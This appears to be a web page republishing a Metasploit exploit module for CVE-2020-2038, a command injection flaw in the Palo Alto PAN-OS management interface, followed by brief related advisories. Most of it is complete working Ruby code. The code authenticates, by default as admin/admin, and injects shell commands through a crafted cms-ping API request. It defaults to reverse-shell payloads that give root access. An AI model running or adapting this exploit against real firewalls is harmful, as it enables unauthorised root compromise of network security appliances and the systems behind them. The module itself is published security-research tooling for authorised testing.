Headline
Palo Alto Networks Authenticated Remote Code Execution
This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck require 'ipaddr' class InvalidRequest < StandardError end class InvalidResponse < StandardError end def initialize(info = {}) super( update_info( info, 'Name' => 'Palo Alto Networks Authenticated Remote Code Execution', 'Description' => %q{ An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10 }, 'Author' => [ 'Mikhail Klyuchnikov', # Vulnerability discovery 'Nikita Abramov', # Vulnerability discovery 'UnD3sc0n0c1d0', # Exploit 'jheysel-r7' # msf module ], 'References' => [ ['CVE', '2020-2038'], ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'], ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'], ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit ], 'DisclosureDate' => '2020-09-09', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Privileged' => true, 'Targets' => [ [ 'Linux ', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %i[echo printf], 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Unix In-Memory', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']), OptString.new('PASSWORD', [false, 'Password for username', 'admin']) ] ) end def check print_status('Authenticating...') begin @api_key = api_key rescue InvalidRequest, InvalidResponse => e return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}") end res = send_request_cgi({ 'method' => 'GET', 'keep_cookies' => 'true', 'uri' => normalize_uri(target_uri.path, 'api/'), 'vars_get' => { 'type' => 'version', 'key' => @api_key } }) return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text) if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') || version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') || version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1') return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def api_key res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api/'), 'vars_get' => { 'type' => 'keygen', 'user' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } }) if res.nil? raise InvalidRequest, 'Unreachable' end if res.code == 401 raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed' end if res.code == 403 raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"' end if res.body.blank? raise InvalidResponse, 'Empty reply from server' end key = res.get_xml_document.xpath('/response/result/key')&.text if key.nil? raise InvalidResponse, 'Empty reply from server' end print_good('Successfully obtained api key') key end def execute_command(cmd, _opts = {}) payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>" send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api/'), 'vars_get' => { 'cmd' => payload, 'type' => 'op', 'key' => @api_key } }) end def exploit begin @api_key ||= api_key rescue InvalidRequest, InvalidResponse => e fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}") end print_status('Exploiting...') case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end endend
Related news
PAN-OS 10.0 Remote Code Execution
PAN-OS version 10.0 suffers from a remote code execution vulnerability.
CVE-2020-2038: CVE-2020-2038 PAN-OS: OS command injection vulnerability in the management web interface
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.